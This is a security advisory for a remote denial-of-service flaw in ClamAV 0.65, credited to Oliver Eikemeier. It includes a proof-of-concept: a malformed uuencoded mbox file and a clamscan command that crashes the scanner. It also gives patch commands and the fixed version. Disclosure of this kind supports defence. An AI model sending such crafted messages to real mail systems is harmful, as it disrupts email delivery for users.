ClamAV Daemon Malformed UUEncoded Message Denial Of Service Vulnerability
BID:9610
Info
| Bugtraq ID: | 9610 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 09 2004 12:00AM |
| Updated: | Feb 09 2004 12:00AM |
| Credit: | Discovery credited to Oliver Eikemeier. |
| Vulnerable: | Clam Anti-Virus ClamAV 0.65 |
| Not Vulnerable: | Clam Anti-Virus ClamAV 0.67 |
Discussion
ClamAV fails to handle specially crafted UUEncoded messages: a malformed uuencode line makes the scanner hit a failed assertion in message.c and abort. Because the scanner crashes while processing the message, an attacker may prevent the delivery of e-mail to users.
Exploit / POC
The following proof-of-concept has been made available by Oliver Eikemeier:
Save the following file to ~/clamtest.mbox:
From -
begin 644 byebye
byebye
end
Then do:
# clamscan --mbox -v ~/clamtest.mbox
assertion "(len >= 0) && (len <= 63)" failed: file "message.c", line 887
Abort (core dumped)
Solution / Fix
Solution:
Gentoo has released an advisory that includes fixes to address this issue. These fixes can be applied with the following commands:
~ # emerge sync
~ # emerge -pv ">=net-mail/clamav-0.6.7"
~ # emerge ">=net-mail/clamav-0.6.7"
The vendor has released ClamAV 0.67 to address this issue.
Clam Anti-Virus ClamAV 0.65
- Clam Anti-Virus clamav-0.67.tar.gz: http://prdownloads.sf.net/clamav/clamav-0.67.tar.gz
References
References:
- Problem Report ports/62586 (FreeBSD)
- Project Homepage (ClamAV)
- clamav 0.65 remote DOS exploit (Oliver Eikemeier)